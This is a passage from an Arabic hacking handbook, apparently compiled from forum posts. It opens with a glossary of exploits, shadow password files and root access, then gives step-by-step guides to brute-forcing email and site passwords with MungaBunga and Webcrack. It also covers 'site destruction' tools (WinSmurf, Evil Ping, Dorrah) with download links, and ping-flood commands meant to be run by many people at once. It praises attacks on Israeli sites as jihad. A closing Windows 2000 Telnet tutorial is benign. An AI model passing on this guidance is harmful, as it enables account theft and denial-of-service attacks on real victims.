                  ‫تحتوي على الثغرات أو االكسبلويت (‪ )Exploits‬التي يتم تطبيقها على الموقع‬

                      ‫لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم ال . و من أمثلة‬

       ‫هذه البرامج، برنامج ‪ Shadow Security Scanner‬و ‪ Stealth‬و ‪Omran Fast‬‬

                                                                           ‫‪ ، Scanner‬الخ .‬

                   ‫و لهذه البرامج أنواع مختلفة ، منها التي تقوم بعمل سكان على نظام أو سيرفر‬

                  ‫معين مثل البرامج المختصة بالسكان على سيرفرات الـ ‪ IIS‬و منها برامج المسح‬




                                         ‫42‬
                                    ‫على ثغرات السي جي اي فقط ‪ CGI‬و ما الى ذلك .‬

              ‫-----------------------------------------------------------------------‬



     ‫اكسبلويت (‪ -:)Exploits‬هي برامج تنفيذية تنفذ من خالل المتصفح . و لها عنوان‬

        ‫‪ ، URL‬تقوم هذه اإلكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى‬

         ‫السيرفر و التجول فيه ، كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين‬

  ‫في السيرفر لعمل كراش له ، و هذا ما يسمى بـ ‪. Buffer Over Flow Exploits‬‬

    ‫هناك أنواع من اإلكسبلويت ، فمنها ال ‪ CGI Exploits‬أو ال ‪ CGI Bugs‬و منها‬

‫ال ‪ Unicodes Exploits‬و منها ال ، ‪ ، Buffer Over Flow Exploits‬و منها‬

   ‫ال ‪، PHP Exploits‬و منها ال‪ DOS Exploits‬و التي تقوم بعملية حجب الخدمة‬

            ‫للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر‬

      ‫أي فايروول ‪ . Fire Wall‬و هناك بعض اإلكسبلويتات المكتوبة بلغة السي و يكون‬

                                                                      ‫امتدادها (.‪. )c‬‬

             ‫هذه اإلكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها‬

       ‫أي االكسبلويت الى اكسبلويت تنفيذي عادي يستخدم من خالل المتصفح ، و لتحويل‬

                 ‫اإلكسبلويت المكتبو بلغة السي هذه الى برنامجا تنفيذيا ، نحتاج إما الى‬

         ‫نظام التشغيل لينوكس او يونكس ، او الى اي كومبايلر يعمل ضمن نظام التشغيل‬

             ‫ويندوز . أشهر هذه الكومبايلرات ( المترجمات أو المحوالت ) برنامج اسمه‬

  ‫‪ Borland C++ Compiler‬و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا.‬

               ‫----------------------------------------------------------------------‬



        ‫الجدار الناري ‪ -:FireWall‬هي برامج تستعملها السيرفرات لحمايتها من الولوج‬

         ‫الغير شرعي لنظام ملفاتها من قبل المتطفلين . هي تمثل الحماية للسيرفر طبعا ،‬

          ‫و لكني أنوه بأن الفايرووالت المستخدمة لحماية السيرفرات ( المواقع ) تختلف‬

                                               ‫عن تلك التي تستخدم لحماية األجهزة .‬



                               ‫52‬
                  ‫----------------------------------------------------------------------‬



‫‪ -:Token‬هو ملف الباسورد المظلل (‪ )Shadowed Passwd‬و الذي يكون فيه الباسورد‬

   ‫على شكل * أو ‪ x‬أي ‪ . Shadowed‬إن وجدت ملف الباسورد مظلال ، فيجب عليك حينها‬

          ‫البحث عن ملف الباسورد الغير المظلل و الذي يسمى ‪ . Shadow file‬تجده في‬

                                                                     ‫/‪. etc/shadow‬‬

                  ‫----------------------------------------------------------------------‬



     ‫‪ -:Anonymouse‬هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد‬

           ‫اختراقه. هناك خاصية في برامج االف تي بي بنفس اإلسم ، تستطيع ان تستعملها‬

                                  ‫في الدخول المجهول الى السيرفر و سحب الملفات منه .‬

                  ‫----------------------------------------------------------------------‬



       ‫‪ -:Valnerableties‬أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب‬

                ‫و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى‬

                      ‫استغاللها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره .‬

          ‫ما هي مفردها ؟ :) ، ‪ Valnerable‬أي ثغرة أو باألصح موضع الضعف و المكان‬

            ‫الغير مؤمن بشكل سليم . و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة‬

                ‫بالسيكيوريتي و أمن الشبكات و غيرها كالقائمة البريدية الموجودة في موقع‬

                                          ‫‪ Security Focus‬أو بوق تراك او غيرها .‬

                  ‫----------------------------------------------------------------------‬



       ‫‪ : passwd file‬هو الملف الذي يحتوي على باسورد الروت و باسوردات األشخاص‬

           ‫المصر ح لهم بالدخول الى السيرفر . باسورد الموقع موجود في نفس الملف طبعا.‬

                  ‫----------------------------------------------------------------------‬



                                  ‫62‬
       ‫الجذر أو الـ ‪ : root‬و هو المستخدم الجذري و الرئيسي للنظام ، له كل الصالحيات‬

            ‫في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات.‬

       ‫غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن‬

               ‫نظام التشغيل لينوكس او يونكس و سوالري و فري بي اس دي و غيرها .‬

                ‫----------------------------------------------------------------------‬

    ‫السيرفر ‪ :Server‬هو الجهاز المستضيف للموقع ، اذ أن كل ملفات الموقع توضع فيه‬

      ‫فهو جهاز كمبيوتر عاد كغيره من األجهزة لكنه ذو امكانيات عالية ككبر حجم القرص‬

       ‫الصلب و سرعته الهائلة ، و هو متصل باإلنترنت .6 ساعة ، و هذا هو سبب كون‬

         ‫المواقع شغالة .6 على اإلنترنت :) . قد يملك و يستضيف السيرفر أكثر من موقع‬

  ‫واحد، و هذا يعتمد من سيرفر آلخر و من شركة ألخرى. ضربة الهاكرز طبعا هي اختراق‬

          ‫السيرفر الذي يملك الكثير من المواقع ، فيسهل حينها اختراق جميع المواقع التي‬

         ‫تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو‬

              ‫سرقة بياناتها و تدميرها أو مسحها من النت تماما ، و هذا ما يحدث للمواقع‬

                   ‫اإلسرائيلية و بكثرة و هلل الحمد . - جزاكم هللا خيرا أيها المجاهدون - .‬

                ‫-----------------------------------------------------------------------‬

     ‫بوفر أوفر فلو ( ‪ : ) Buffer over Flow‬و هي نوع من أنواع االكسبلويتات التي‬

‫تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت اإلف تي بي‬

    ‫أو غيره ألجل اضعاف اتصال السيرفر و فصل اتصاله بهذا بهذا البورت و اللغاء الرقعة‬

        ‫الموجودة بها كي يتم استغاللها مجددا - بعد عمل الكراش لها طبعا - يتم استغاللها‬

 ‫في معاودة اإلتصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها .‬

   ‫و هي شبيهة نوعا ما بعملية حجب الخدمة - ‪ - DOS‬اذ أنها تقوم بعملية اوفر لود على‬

                                                                ‫جزء مركز من السيرفر .‬

                              ‫انتهى،،،‬



       ‫"اختراق المواقع للمبتدئين"‬


                                 ‫72‬
                                                                               ‫اإلختراق للمبتدئين:::‬

‫في هذا القسم سوف أقوم بشر ح الطرق المستخدمة في اختراق المواقع بالنسبة للمبتدئين وهذه الطرق تعتمد‬

      ‫اعتماداً كليا ً على برامج التخمين. وهذه البرامج تحتوي على قائمة كبيرة تحتوي على كلمات سر يقوم‬

   ‫البرنامج بتجربها على الموقع الهدف الى أن يصل إلى كلمة السر الصحيحة الخاصة بالموقع الهدف وبعد‬

  ‫ذلك يسيطر المخترق على الموقع. لكن يعيب هذه الطريقة أنها تستمر إلى أوقات طويلة بالساعات وباأليام‬

   ‫وهي مكلفة ماديا ألن الجهاز سيبقى متصال طوال الوقت باألنترنت حتى يتم اكتشاف كلمة السرالصحيحة.‬



                                            ‫انتهى،،،‬




                    ‫" اإلختراق ببرنامج ‪" Webcrack‬‬


                                               ‫82‬
                                                   ‫<منقول من منتدى إعصار>‬

                                                             ‫<الكاتب: النازي>‬

                                                                  ‫مرحبا شباب‬

        ‫انا اعلم ان الكثير منك يعرفون هذا البرنامج لكن هل جربتوه .... احب اقول‬

‫انه واحد من اقوى البرامج الاختراق المواقع وانا من االشخاص الذين يعتمدون عليه‬

                                                                    ‫الشر ح ...‬




                         ‫92‬
30
                                                     Error!




                                    ‫وهذي وصلة البرنامج‬

http://www.dunbell.freeserve.co.uk/webcrack40.zip

              ،،،‫انتهى‬




                31
               ‫"اإلختراق ببرنامج ‪" MungaBunga‬‬

                                                                                         ‫<منقول>‬

                                                                   ‫<الكاتب: ‪> KING HAKER‬‬

                                                           ‫السالم عليكم و رحمه هللا على اخوانى:‬
‫اليوم نشر ح برنامج ‪ MUNGA BUNGA‬الذى يعد من افضل برامج اختراق االيميل حتى االن و لكن‬
                                                 ‫يوجد به عيب بسيط و هو انه ال يوجد به بروكسى‬
                                                                          ‫اما مميزاته فكثيره جدا:‬
                                                                   ‫2-سريع جدا فى تجربه الكلمات‬
                                                        ‫6-يواصل التجربه تلقائيا بعد انقطاع الخط‬
                                                                 ‫3-يمكنك اختراق المواقع به ايضا‬
                                                ‫.-يعلن لك حاله اتصاله بسرفر االيميل الذى تخترقه‬
                               ‫5-يمكنك التحكم فى عدد حروف الكلمات الذى سيبدا بها(حسب التوقع)‬
             ‫2-يحتوى على قائمه باسوردس خاصه بالهوت ميل و بها عدد هائل من الكلمات المتوقعه‬
                                                                            ‫و كذلك بالنسبه للياهو‬
                                                                        ‫و السرفرات االخرى ايضا‬
                                                                               ‫و االن نبدا الشر ح:‬

                                                                     ‫هذا شكل البرنامج عند تشغيله‬




                                                             ‫فى رقم 2 تضع االيميل الذى ستخترقه‬

 ‫فى 6 تضغط ‪ BROWSE‬و تضع قائمه الباسوردس المليئه بالكلمات الذى سيقوم البرنامج بتجربتها‬




                                            ‫23‬
‫فى 3 تضغط على ‪ BROWSE‬ايضا و تضع القائمه الخاصه بسرفر االيميل الذى ستخترقه (اذا كان فى‬
                                                       ‫الهوت ميل تضع قائمه الهوت ميل .....الخ)‬

                                                     ‫. هو زر بدء الهكر على االيميل و تجربه الكلمات‬

                                        ‫فى 5 يعرض الباسوردس التى يجربها االن (فى وقت الهكر)‬

                                ‫فى 2 يعرض الكلمات التى بها اخطاء و سيتم المحاوله بها مره اخرى‬

                                                      ‫1 هى حاله االتصال بالسرفر الموجود به االيميل‬

                                       ‫فى 0 يعرض معلومات السرفر التابع لاليميل الذى يجرب عليه‬

                                      ‫بالضغط على رقم 8 تذهب مباشره الى موقع البرنامج الرئيسى‬

 ‫نضع عالمه صح امام 22 حتى اذا انقطع الخط فجاءه يتوقف البرنامج و عند معاوده االتصال يستمر فى‬
                                                                      ‫التجربه و ال يبدا من االول‬

           ‫عند و ضع العالمه على 22 ال يجرب البرنامج الكلمات التى بها اخطاء التى تظهر فى رقم 2‬

                   ‫نضع عالمه صح امام 62 حتى ال يجرب البرنامج الكلمات التى تحتوى على مسافات‬

‫عند وضع العالمه على 32 ال يجرب البرنامج الكلمات التى اقل من خمس احرف (مطلوب فى الهوت ميل)‬

          ‫و عند وضع العالمه ايضا على .2 ال يجرب البرنامج الكلمات التى هى اكثر من عشره احرف‬

                                                          ‫اليس برنامج ممتاز‬
                                                              ‫و قوى و سريع‬
                                                              ‫وصلة التنزيل :‬
                  ‫‪http://koti.mbnet.fi/hypnosis/caliberx/cracking.htm‬‬

                                          ‫انتهى،،،‬




                                            ‫33‬
               ‫" برنامج تدمير المواقع ‪" WinSmurf‬‬

                                                                          ‫<منقول من منتدى إعصار>‬

                                                                                   ‫<الكاتب: المدمر>‬

      ‫أثبت هذا البرنامج فعاليته الكبيرة في تدمير المواقع والسيما أنه قوي جدا في إرسال طلبات وسريع ..‬

                        ‫إذا هاهو البرنامج الحديث من ‪ winsmurf‬والذي يسميه البعض مرعب المواقع‬

                                                                                     ‫‪Scree Shot‬‬
                                       ‫--------------------------------------------------------------‬




                                       ‫--------------------------------------------------------------‬

                                                                ‫***كيف تستخدم ‪ winsmurf‬؟ ***‬

‫في غاية البساطة فقط قم بإنشاء ملف ‪ txt‬يعني نصي وحط في حروف وأرقام كثيرة يعني حاول تخلي الملف‬
                                                       ‫كبير شوي وبتعدى 22 ‪ Kb‬بعدين احفظه‬
                                                              ‫وبعد كذا قم بتشغيل‪winsmurf‬‬
                                                                         ‫واستعرض الملف ...‬

                                                                                    ‫وصلة البرنامج..‬

                              ‫‪http://www.planet-eagle.de/files/WSmurf.zip‬‬

                                             ‫انتهى،،،‬




                                               ‫43‬
           ‫" شرح برنامج ‪ Evil Ping‬لتدمير المواقع "‬

                                                             ‫<منقول من موقع الجهاد اإللكتروني>‬




‫استخدامه من قبل 226 شخص على األقل في نفس الوقت على نفس الموقع لينجح التدمير بإذن هللا عزوجل.‬

                                          ‫ويمكن زيادة الهجمات لتصبح أقوى حتى يتم تدمير الموقع.‬

                                          ‫انتهى،،،‬




                                            ‫53‬
       ‫" شرح برنامج الدرة لتدمير المواقع "‬

                                                                                  ‫<منقول>‬

‫عند اإلنتهاء من تحميل البرنامج , فك ضغط الملف , و عند تشغيله سيظهر لك الشكل التالي :‬




                                    ‫لبدء الهجوم فقط إضغط على‬


                                     ‫وإليقاف الهجوم إضغط على‬



‫عند بدء الهجوم سيعمل برنامج الدرة على بحث البروكسي الخاص بك و سيضعه لك في مكانه.‬




                       ‫و لتخفي هويتك عند الهجوم قم بتشغيل :‬




                             ‫و ضع رقم البروكسي التالي‬




                                        ‫63‬
                            ‫وسيكون عنوان الموقع المراد الهجوم عليه هنا‬




‫و من خواص هذا البرنامج انه ال يستطيع احد تغيير جهة الهجوم و لتجديد عنوان الموقع المراد الهجوم عليه‬
                    ‫و هو سيقوم تلقائيا بالبحث و التغيير.‬           ‫فقط قم بضغط‬

             ‫و لمعرفة آخر اخبار البرنامج و المواقع التي تم النجا ح بقصفها فقط قم بضغط :‬




                                     ‫و سيظهر لك الشكل التالي :‬




                             ‫و ستظهر لك األخبار.‬              ‫قم بضغط‬



                 ‫و لعمل البرنامج بطريقة ذكية بحيث ال يبطيء اإلنترنت , قم بتشغيل :‬




                            ‫لتشغيل البرنامج عند عمل الوندوز قم بتشغيل :‬


                                                 ‫73‬
           ‫الشكل التالي يمثل عدد المرات الناجحة :‬


                                    ‫و هذا يمثل عدد المرات الفاشلة :‬

                                              ‫وصلة تحميل البرنامج..‬

 ‫‪http://www.geocities.com/boom_q8y4/dorrah.zip‬‬

             ‫انتهى،،،‬




‫" تدمير المواقع بدون برامج "‬

                                               ‫<الكاتب:ماكس هاك >‬



                ‫83‬
‫في هذا الدرس سأقوم بشر ح عدة طرق لتدمير المواقع بدون برامج ولكن هناك شرط لتدميرها أن يجتمع عدد‬
                            ‫كبير على الموقع نفسه ويقوموا بتطيق الطريقة معا بعض في نفس الوقت...‬

                                                                                   ‫الطريقة األولى::‬

                                            ‫قم بالتوجه إلى "الدوس" ===>== اكتب األمر التالي :ـ‬

‫‪Ping www.xx.com‬‬

                                                                            ‫‪:Xxx‬يعني اسم الموقع‬

                                                              ‫بعد ذلك سيخرج لك رقم أي بي الموقع.‬

                                                                                    ‫قم بكتابة األمر:‬

‫(اسم الموقع) (قوة الضربه( ‪) -I‬عددالضربات) ‪ping -n‬‬

                                                                                          ‫مثال ذلك:‬

‫‪ping -n 1000 -l 400 www.xxx.com‬‬

                                                                                   ‫الطريقة الثانية::‬

                                    ‫بعد استخراج األي بي تبع الموقع المراد بالطريقة الي في األعلى...‬

                                                                                    ‫قم بكتابة األمر:‬

‫‪ping -t ip‬‬

                                                               ‫حيث ‪ ip‬يعني أي بي الموقع الموراد.‬

                                           ‫انتهى،،،‬




                                    ‫" التلنيت "‬

                                                                            ‫<منقول من موقع نورة>‬



                                              ‫93‬
                                                       ‫بعد قراءة هذا الموضوع ستكون قادر على‬

                                                                          ‫فهم معنى خدمة التلنت‬

                                                           ‫معرفة مكان تشغيل الخدمة والتحكم بها‬

                                                                  ‫تمرين التثبيت وإستخدام التلنت‬

     ‫خدمة التلنت في ويندوز 2226 تسمح لمستخدمين عميل التلنت باإلتصال بكمبيوتر يشغل خدمة التلنت‬
    ‫وإستعمال سطر األوامر ويصبح كما لو كان يجلس أمامه ، ويمكن أن تكون خدمة التلنت عبارة إلتصال‬
                                                                   ‫المستخدمين مع بعضهم البعض‬

                         ‫وأي كمبيوتر يشغل خدمة التلنت يمكن أن يدعم إلى 32 عميل تلنت في أي وقت‬

                                                                  Telnet Authentication

      You can use your local Windows 2000 user name and password or
   domain account information to access the Telnet server. The security
  scheme is integrated into Windows 2000 security. If you do not use the
      NT LAN Manager (NTLM) authentication option, the user name and
     password are sent to the Telnet server as plain text.s 2000 security
      context for authentication and the user is not prompted for a user

  If you are using NTLM authentication, the client uses the Windowname
    ‫يمكن استعمال‬and password. The user name and password are encrypted.
      ‫اسمك وكلمة المرور الخاصه بك من اجل الوصول إلى ملقم التلنت ، إذا كنت تستخدم خيار التحقق من‬
        ‫ سيرسل االسم و كلمة المرور مشفرة وإذا لم تكن مستخدمة سترسل كنص عادي‬NTLM ‫الصحة‬

                                                                                        ‫مالحظة‬

      If the User Must Change Password At Next Logon option is set for a
              user, the user cannot log on to the Telnet service when NTLM
   authentication is used. The user must log on to the server directly and
‫إذا كان هذا‬change the password, and then log on through the Telnet client.
       ‫الخيار منشط في خصائص كلمة المرور ألحد المستخدمين لن يتمكن من الدخول على ملقم التلنت عند‬
                         ‫ يجب الدخول ثم تغير كلمة المرور ثم التسجيل على خدمة التلنت‬NTLM ‫إستخدام‬



                                                                       ‫تشغيل و إيقاف ملقم التلنت‬

In a Windows 2000 Server default installation, the Telnet service is set to
      manual startup. You can use the Services snap-in or the Computer
    Management snap-in to start, stop, or configure the Telnet service for
  ‫في التثبيت االفتراضي لويندوز 2226 تكون خدمة التلنت غير منشطة وتكون‬automatic startup.
              ‫ لتشغيل أو إيقاف خدمة التلنت‬Services ‫على الوضع اليدوي ، ويمكن إستخدام األداة‬




                                             40
                                                                                      ‫مكان التلنت‬

 In the Computer Management snap-in, Telnet is a service located under
    the Services and Applications node. Select Services from the console
  tree, and then select Telnet from the list of services in the details pane.

                                                             ‫تشغيل التلنت و إيقافة من سطر االوامر‬

  You can also start or stop the Telnet service from a command prompt.
      To start Telnet Server, type net start tlntsvr or net start telnet at the
 command prompt, and then press Enter. To stop Telnet Server, type net
   stop tlntsvr or net stop telnet at the command prompt, and then press
                                                                        Enter.

                                                              Telnet Server Admin ‫األداة‬

           You can use the Telnet Server Admin utility to start, stop, or get
      information about Telnet Server. You can also use it to get a list of
       current users, terminate a user's session, or change Telnet Server
  ‫ لتشغيل أو إيقاف أو الحصول‬Telnet Server Admin ‫يمكن إستخدام األداة‬registry settings.
    ‫على معلومات عن الملقم ويمكن كذلك الحصول على عدد المستخدمين و التحكم في الجلسة الحالية من‬
                                                                 ‫إنهاء اإلتصال و تغير االعدادات‬

  ‫ الموجودة‬Telnet Administration Tool ‫ , أضغط على‬Telnet Server Admin ‫لفتح األداة‬
  ‫. إذا كنت ال‬OK ‫, ثم‬tlntadmn ‫, اكتب‬Run ‫, ثم‬Start ‫ أو اضغط‬Administrative Tools ‫في‬
.)Adminpak.msi( ‫ , تحتاج إلى تثبيت أدوات اإلدارة‬Telnet Server Admin ‫تستطيع فتح األداة‬

                           Telnet Server Administration ‫يبين الجدول التالي خيارات األداة‬

                                                                         ‫الوصف‬                      ‫الخيار اإلسم‬
                                    Telnet Server Admin‫ينهي جلسة األداة‬                     Quit this         0
                                                                                          application
‫يبين المستخدمين المتصلين بخدمة التلنت مع توضيح اسم المستخدم و الدومين و وعنوان‬       List the current         1
                                                           ‫الجهاز ووقت الدخول‬                  users
                                      ‫ ينهي جلسة أحد المستخدمين الذي أنت تختاره‬Terminate a user               2
                                                                                       session
                                      ‫يزود قائمة بإعدادات السجل التي يمكن تغيرها‬     Display/change           3
                                                                                    registry settings
                                                               ‫يشغل خدمة التلنت‬     Start the service         4
                                                              ‫يوقف خدمة التلنت‬      Stop the service          5




                                                                                   ‫إصطياد المشاكل‬




                                             41
                          ‫يبين الجدول التالي بعض المشاكل التي يمكن أن تواجهك عند إستخدام التلنت‬

                                   ‫الحل‬                                 ‫السبب‬                      ‫رسالة الخطاء‬
          ‫راجع الخيارات وأعد كتابة خيارك‬          ‫القيمة المكتوبة لم تكن مقبولة‬                Invalid input
                        ‫شغل خدمة التلنت‬                ‫خدمة التلنت غير مشتغلة‬          Failed to open the
                                                                                             registry key
                             ‫شغل الخدمة‬     ‫خدمة التلنت غير مشتغلة على الملقم‬         Failed to query the
                                                                                           registry value

                                                                                    ‫عميل التلنت‬

  You can use Microsoft Telnet Client to connect to a remote computer
   running the Telnet service or other Telnet server software. Once you
      have made this connection, you can communicate with the Telnet
    server. The type of session you conduct depends on how the Telnet
software is configured. Communication, games, system administration,
            and local logon simulations are some typical uses of Telnet.

   The Telnet client uses the Telnet protocol, part of the TCP/IP suite of
 protocols, to connect to a remote computer over a network. The Telnet
   client software allows a computer to connect to a remote server. You
  can use the Telnet client provided with Windows 2000 to connect to a
remote computer, log on to the remote computer, and interact with it as
                                         if you were sitting in front of it.

Users of previous versions of Microsoft's Telnet client may notice a few
changes in the version included with Windows 2000. The most obvious
          change is that Microsoft Telnet Client is now a command-line
    application rather than a Windows application. As a command-line
  application, Microsoft Telnet Client will seem very familiar to users of
                                               UNIX-based Telnet clients.

      An important new feature found in Microsoft Telnet Client is NTLM
 authentication support. Using this feature, a computer using Microsoft
Telnet Client can log on to a Windows 2000 computer running the Telnet
                                  service by using NTLM authentication.



                                                                                  ‫إستعمال التلنت‬

  .‫ في موجه األوامر‬telnet ‫ وتستطيع كتابة‬telnet. ‫ ثم اكتب‬Run, ‫ ثم‬Start, ‫ انقر‬Telnet, ‫لتشغيل‬
‫ مثبت على جهازك ومضبوط تكوينه ويكون‬TCP/IP ‫لتتمكن من أستخدام التلنت يجب أن يكون البروتوكول‬
                                                  ‫لديك حساب مسجل على الجهاز الذي ستتصل به‬

  To display help for Telnet, type help at the Microsoft Telnet command
      prompt. To connect to a site, type open <computer_name> where


                                            42
     ‫‪<computer_name> is the IP address or host name of the computer‬‬
                                          ‫.‪running the Telnet service‬‬

                                                           ‫تمرين ضبط وإتصال بخدمة التلنت‬

             ‫في هذا التمرين يجب أن يكون لديك شبكة على األقل جهازين متصلين مع بعضهم البعض‬

                             ‫ولنفترض أن الجهاز االول اسمه 1‪ Hishem‬و الثاني 2‪Hishem‬‬

‫وسنفترض أن خدمة التلنت مثبته على 2‪ Hishem‬ثم سنقوم باإلتصال من 1‪ Hishem‬إلى2‪Hishem‬‬

                                             ‫سنقوم اآلن بتثبيت الخدمة على جهاز1‪Hishem‬‬

                                         ‫سجل الدخول إلى 1‪ Hishem‬ك ‪Administrator‬‬

             ‫من , ‪ Start‬ثم ,‪ Programs‬ثم ‪ Administrative Tools‬اضغط .‪Services‬‬

                                                                  ‫تظهر األداة ‪Services‬‬

                                      ‫من النافذه مرر ألى اسفل ثم ضغط مزدوج على .‪Telnet‬‬

                      ‫يظهر مربع حوار )‪The Telnet Properties (Local Computer‬‬

                                     ‫غير ‪ Startup Type‬من ‪ Manual‬إلى.‪Automatic‬‬

                                                ‫في القسم,‪ Service status‬اضغط. ‪Start‬‬

                 ‫اضغط ‪ OK‬إلغلق مربع الحوار‪(Local Computer) Telnet properties‬‬

                                                           ‫أغلق وحدة التحكم . ‪Services‬‬



                                                   ‫سنتصل من 1‪ Hishem‬إلى 2‪Hishem‬‬



                                                                     ‫من , ‪ Start‬ثم.‪Run‬‬

                                                                    ‫اكتب ‪ telnet‬ثم .‪OK‬‬

                                                        ‫تظهر موجه أوامر مايكروسوفت تلنت‬

                                                   ‫اكتب ‪ help‬أو ? لمشاهدة األوامر المتاحه‬

                                                ‫تظهر جميع األوامر المدعومة في خدمة التلنت‬

                                                                 ‫اكتب 2‪open Hishem‬‬

                                                                    ‫ستشاهد شاشة الترحيب‬


                                        ‫34‬
                                                                                    ‫مالحظة‬

                                                            ‫يمكن إستخدام حرف ‪ o‬بدل‪open‬‬

                                      ‫أي اوامر يمكنك تشغيلها من سطر األوامر في 2‪Hishem‬‬

          ‫اترك هذا اإلتصال نشط ال توقفه سننتقل اآلن إلى جهاز 2‪ Hishem‬لمشاهدة جلسة التلنت‬



       ‫من جهاز 2‪ Hishme‬سنراقب خدمة التلنت ثم نوقف ونقطع اإلتصال من العميل 1‪Hishem‬‬



                                                                      ‫من , ‪ Start‬ثم.‪Run‬‬

                                                                  ‫اكتب ‪ tlntadmn‬ثم .‪OK‬‬

                                           ‫يظهر إطار اوامر األداة‪Telnet Server Admin‬‬

‫اكتب 2 لمشاهدة جميع اإلتصاالت الحالية كما في المثال نشاهد قد عرض اسم المستخدم و اسم الدومين‬
                                                ‫‪ NOR‬ورقم ‪ IP‬ونوع االتصال ووقت الدخول‬




                                                                ‫اكتب 6 إلنهاء جلسة مستخدم‬



                                         ‫44‬
                                     ‫تظهر رسالة تطلب منك تحديد هوية المستخدم الذي تريد فصله‬

              ‫اكتب 2هذا رقم المستخدم في القائمة وال يوجد معنا في المثال غير و احد لذالك تكتب 2‬

                                                                    ‫تظهر الئحة باالوامر المتاحة‬

                                ‫إرجع إلى جهاز 1‪ Hishem‬سترا أن االتصال قد إنفصل مثل المثال‬




                                                                       ‫اضغط أي مفتا ح للمتابعة‬



                                                     ‫كيف نستفيد من خدمة التلنت في جلب البريد‬

 ‫إذ تعذر عليك سحب البريد بالبرامج المخصصة لسبب ما يمكن أن تستخدم التلنت لسحب البريد وحذف‬
                                         ‫الرسائل التي قد تكون سبب المشكلة و الطريقة كما يلي‬

                                                                    ‫تكون على إتصال مع الشبكة‬

‫من ‪ Start‬ثم ‪ Run‬ثم تكتب 011 ‪ Telnet pop.mail.yahoo.com‬طبعا إذا كان حسابك مع‬
 ‫الياهو أو اكتب الحساب الخاص بك مع مالحظة وجود فراغ بين الكلمة االولى و الجملة الثانية و الرقم‬

‫ستظهر لك نافذة مثل الدوس اكتب ‪ user‬ثم اكتب بعدها اسم المستخدم في بريدك مع مالحظة أن الذي‬
                               ‫ستكتبه ال تشاهده على النافذة ال تهتم مثل ‪ user xxxx‬ثم إنتر‬

                           ‫بعد ذلك اكتب ‪ pass‬ثم اكتب الرقم السري مثل ‪ pass xxxx‬ثم إنتر‬

                                      ‫إذا كان إدخالك صحيح ستشاهد كلمة ‪ Ok‬بعد ما تضغط إنتر‬




                                                                       ‫سيتم إدخالك إلى الحساب‬

                                             ‫لمشاهدة جميع الرسائل وأحجامها اكتب ‪List‬ثم إنتر‬

                   ‫ستشاهد ترتيب الرسائل تحت بعض وأمام كل رقم رقم ثاني يدل على حجم الرسالة‬




                                          ‫54‬
                            ‫لحذف رسالة من القائمة اكتب ‪ dele‬ثم رقم الرسالة الهدف‬

                                                       ‫تنفع هذه الطريقة مع بريد ‪pop‬‬

                              ‫طريقة سحب البريد عن طريق التلنت من الدكتور الفنتوخ‬

                                                    ‫بعض األوامر المستخدمة مع التلنت‬

                                                      ‫وصل عميل التلنت مع جهاز بعيد‬

                                                                            ‫بناء الجملة‬

                                            ‫]‪open [\\RemoteServer] [Port‬‬

                                                                              ‫المعلمات‬

                                                               ‫‪\\RemoteServer‬‬

  ‫تحديد اسم الملقم الذي تريد إدارته .إن لم تحدد ملقما ً ما، سيتم افتراض الملقم المحلي .‬

                                                                               ‫‪Port‬‬

‫تحديد المنفذ الذي تريد استخدامه. إن لم تحدد منفذاً ما، سيتم افتراض المنفذ االفتراضي .‬

                                                                              ‫مالحظات‬

                                                       ‫يمكنك اختصار هذا األمر إلى .‪o‬‬

                                                                                  ‫أمثلة‬

                     ‫لالتصال بملقم بعيد ‪ Redmond‬من خالل رقم المنفذ ..، اكتب:‬
                                                        ‫44 ‪o redmond‬‬



                                           ‫لقطع تصال عميل ‪ Telnet‬من كمبيوتر بعيد‬

                                                                            ‫بناء الجملة‬

                                                     ‫]‪close [\\RemoteServer‬‬

                                                                              ‫المعلمات‬



                               ‫64‬
                                                             ‫‪\\RemoteServer‬‬

‫تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقما ً ما، سيتم افتراض الملقم المحلي .‬

                                                                            ‫مالحظات‬

                                                     ‫يمكنك اختصار هذا األمر إلى .‪c‬‬

                                                                                ‫أمثلة‬

                                   ‫لقطع االتصال من ملقم بعيد ‪ ،Redmond‬اكتب:‬
                                                         ‫44 ‪c redmond‬‬



                                                        ‫إلرسال أوامر عميل‪Telnet‬‬

                                                                          ‫بناء الجملة‬

       ‫]?[ ]‪send [\\RemoteServer] [ao] [ayt] [esc] [ip] [synch‬‬

                                                                            ‫المعلمات‬

                                                             ‫‪\\RemoteServer‬‬

‫تحديد اسم الملقم الذي تريد إدارته. إن لم تحدد ملقما ً ما، سيتم افتراض الملقم المحلي.‬

                                                                                ‫‪ao‬‬

                                                                 ‫إحباط أمر اإلخراج .‬

                                                                               ‫‪ayt‬‬

                                                ‫إرسال أمر ."?‪"Are you there‬‬

                                                                               ‫‪esc‬‬

                                                       ‫إرسال حرف الهروب الحالي .‬

                                                                                 ‫‪ip‬‬

                                                                ‫مقاطعة أمر العملية .‬

                                                                           ‫‪synch‬‬

                                                         ‫أداء عملية تزامن .‪Telnet‬‬



                                             ‫لعرض اإلعدادات الحالية لعميل‪Telnet‬‬


                             ‫74‬
                                                                                          ‫بناء الجملة‬

                                                                                         ‫‪display‬‬

                                                                                            ‫المعلمات‬

                                                                                                  ‫بال‬

                                                                                            ‫مالحظات‬

‫يسرد األمر ‪ display‬معلمات التشغيل الحالية لعميل .‪ Telnet‬إذا كنت في جلسة عمل( ‪ Telnet‬بعبارة‬
